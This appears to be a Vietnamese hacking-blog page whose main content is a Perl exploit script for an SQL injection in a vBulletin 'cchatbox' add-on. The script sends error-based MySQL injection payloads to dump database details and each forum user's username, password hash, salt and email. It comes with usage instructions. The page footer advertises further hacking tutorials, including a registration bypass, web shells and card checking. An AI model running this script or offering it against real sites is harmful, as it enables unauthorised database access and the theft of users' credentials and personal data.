!/usr/bin/perluse LWP::UserAgent;$ua = LWP::UserAgent->new;$ua->agent("MyApp/0.1 ");print "##################################\n";print "############ EXPLOIT #############\n";print "##################################\n";print "## Portal: cchatbox ##\n";print "## Bug: SQLI ##\n";print "## Author: DSecurity ##\n";print "## Coder: vv0lll ##\n";print "##################################\n";
print "Use: exploit.pl address number_user sleeptime\n";print "Example: exploit.pl http://localhost/vbb 10 10\n";if(@ARGV < 2) {exit;}print "\n\n================================================\n";#Foot printprint v_request('MySQL version: ','@@version');print v_request('Data dir: ','@@datadir');print v_request('User: ','user()');print v_request('Database: ','database()');
#Get userfor($i=1;$i<=$ARGV[1];$i++){print "-----------------------------------------\n";print $id = v_request('ID: ','userid','user','1',$i-1);if($id =~ /(ID:)\s(.*)/){print v_request('Group: ','usergroupid','user','userid='.$2);print v_request('Username: ','username','user','userid='.$2);print v_request('Password: ','password','user','userid='.$2);print v_request('Salt: ','salt','user','userid='.$2);print v_request('Email: ','email','user','userid='.$2);}
}
print $ARVG[0];sub v_request{#Declare$print = $_[0];$select = $_[1];$from = $_[2];$where = $_[3];$limit = $_[4];$sleep = $ARGV[2];if ($from eq '') {$from = 'information_schema.tables';}if ($where eq '') {$where = '1';}if ($limit eq '') {$limit = '0';}if ($sleep eq '') {$sleep = '10';}
# Create a requestmy $req = HTTP::Request->new(POST => $ARGV[0].'/cchatbox.php');$req->content_type('application/x-www-form-urlencoded');$req->content('do=edit&messageid=0 and (SELECT 1 FROM(SELECT COUNT(*),CONCAT((select '.$select.' from '.$from.' WHERE '.$where.' limit '.$limit.',1),FLOOR(RAND(1)*3))x FROM information_schema.tables GROUP BY x)a)');
# Pass request to the user agent and get a response backmy $res = $ua->request($req);#print $res->content;if($res->content =~ /(MySQL Error)(.*?)'(.*?)0'(.*)/){$test = $3};sleep($sleep);return $print.$test."\n";}
Bài đăng phổ biến
-
================= vBulletin 3.8.4 & 3.8.5 Registration Bypass Vulnerability =============== 0101010101010101010101010101010101010101... -
Khai thác trên linux Video _http://vimeo.com/15856549 This proof-of-concept exploit performs a Padding Oracle attack against a simple ASP.N...
-
đm hum nay ngồi rảnh onle lâu , thấy rum lặng quá lên viết 1 bài cho ae xem chơi gọi là tut tut này bắt đầu vào 6:35:20s vcl chưa p/s : x...
-
_Tiếp ngày buồn , bài này chỉ hướng dẫn các NB về cách được gọi là mấy bác nói là "HACK" , ở đây mình chỉ nói đến mức cực cơ bản n... -
Post lại tut check VBV chuẩn ko cần chỉnh. Đã test vẫn good nhé. Ai đã biết rồi thì đừng phan gạch. Post lại cho các mem NB và các mem chư...
-
_Lâu lâu ko viết tut , vào làm cái gọi là tut chơi hehe ,bữa có nhặt đc con shell trên forum soha ,phân tích server thì khá khó LOCAL ,getro... -
By : ic3_princ3 http://forum.vnhack.us/showthread.php?t=920 thấy bạn mr_knight1997 có đưa lên cái site nhờ anh em trong forum giúp,tính vào...
-
Tình hình là vừa ngâm cứu, được ku songoku gửu cho cái diễn đàn củ chuối này bảo là của thằng nào VHB ấy quên con mẹ nó rồi Ping thử thì lại... -
Đêm hum ngồi nghịch tý _code http://up.rvnfamily.com/ubr_file_upload.php Download http://www.uploadstation.com/file/9UZavxS/tmt-today_share....
Copyright © 123 H4ck' Blog. Cung cấp bởi Blogger